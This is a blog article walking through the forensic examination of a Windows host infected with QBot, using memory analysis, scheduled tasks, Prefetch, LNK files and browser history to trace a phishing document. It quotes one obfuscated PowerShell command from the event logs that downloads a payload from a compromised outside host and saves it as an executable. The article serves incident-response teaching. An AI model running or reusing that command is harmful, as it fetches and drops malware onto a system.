Home Articles Forensic Walkthrough: QBot Infection

Forensic Walkthrough: QBot Infection

Comments Off on Forensic Walkthrough: QBot Infection

For some reason, there are not so many posts on forensic examination of hosts infected with different malware families. We decided to change this tendency and start a new series – Forensic Walkthrough.

Today’s guest is QBot (QakBot). It was first discovered in 2009 and mainly targeted browsing data related to banking websites. Its worm-like capabilities allow it to spread through the networks, so you may find a bunch of infected hosts during your investigations. What’s more, it was suspected to be used by MegaCortex ransomware operators – “big game hunters” targeting big enterprises.

So we have a memory dump and a bitstream image of a compromised host. Let’s look what we can find!

Volatility has a bunch of plugins very useful for examinations related to incident response. Let’s start from pstree, a plugin capable of building prosesses tree. We can immediately see some suspicious processes:

A part of pstree output

So here we have a process with suspicious name, egvmxii.exe, started by Windows Explorer (explorer.exe). It must be something wrong with it. Ok, let’s continue to collect low-hanging fruits. Our potentially rogue process’ parent PID is 4000, let’s run malfind against it, a plugin capable of finding hidden or injected code in user mode memory.

And voila:

A part of malfind output

So, something injected its code into legitimate Windows Explorer process (explorer.exe with PID 4000). Ok, good, let’s look inside our bitstream image. Remember schtasks.exe spawned by explorer.exe? It’s Task Scheduler. A-a-and, what can it be used for? Creating scheduled tasks, which are quite common persistence mechanism.

So let’s start from looking inside C:\Windows\System32\Tasks. One of the tasks is quite suspicious:

The contents of C:\Windows\System32\Tasks as seen in Belkasoft Evidence Center

So, what does it run? Here is the answer:

Path to the executable run by suspicious task

Oh, egvmxii.exe, we have already seen it, right? Let’s look at its timestamps – we can use them as pivot point:

Malicious file timestamps

So, the file was created at 15:37:25 UTC. Let’s look at events near this time. If we look inside PowerShell.evtx, we can easily spot quite an interesting string in the logs:

powershell -Command (New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(‘aHR0cDovL3NvbGxpZ2h0LmNvbS5oay93cC1jb250ZW50L3VwbG9hZHMvMjAyMC8wNC9sYXN0LzQ0NDQ0NC5wbmc=’)),[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(‘QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl’)) + ‘1’ + ‘.e’ + ‘x’ + ‘e’)

What happens here? PowerShell is used to download 444444.png from hxxp://sollight[.]com.hk/wp-content/uploads/2020/04/last/, a compromised website, and save it as file1.exe under C:\Users\Public\tmpdir\.

Ok, let’s try to find evidence of execution. Prefetch folder is a good place to start. And here we go – FILE1.EXE-46CF3340.pf:

Evidence of file1.exe execution

So, it was first executed at 15:37:23 (UTC). If we look at another file, EGVMXII.EXE-EAA08D18.pf, we can see that egvmxii.exe was first executed 7 seconds later – at 15:37:30 (UTC). Great, looks like we found the source of infection, right? But what executed PowerShell? Let’s find out!

Recent files may be of great help. And here we go, looks like Operating Agreement_1.doc was opened a few seconds before PowerShell was started:

An LNK file parsed with Belkasoft Evidence Center

Let’s collect more information about this file. For example, we can search for its name. And yes, we have a bunch of results!

Most interesting hit is in Microsoft Edge downloads history. Now we know that the file was originaly downloaded as Operating Agreement_1.zip from OneDrive:

Information extracted from WebCacheV01.dat

Good ol’ phishing link – nice find! But that’s not all! If we look inside Windows Defender log, we can find more: extracted file is detected as TrojanDownloader:O97M/Obfuse.RDU!MTB. But it seems it was too late.

Ok, now we know that our victim downloaded an archive with a weaponized Microsoft Office document from a phishing link, opened it and it lead to QBot infection. Also we found out that QBot used scheduled tasks for persistence. But was it the only persistence mechanism used? Let’s run another keyword search, this time using egvmxii.exe as the keyword.

And yes, there is another persistence mechanism:

Run key persistence

Of course, it’s not the whole set of forensic artifacts you can find dealing with QBot infections, but there are quite a few. As always, happy forensicating!

Load More Related Articles
Load More In Articles
Comments are closed.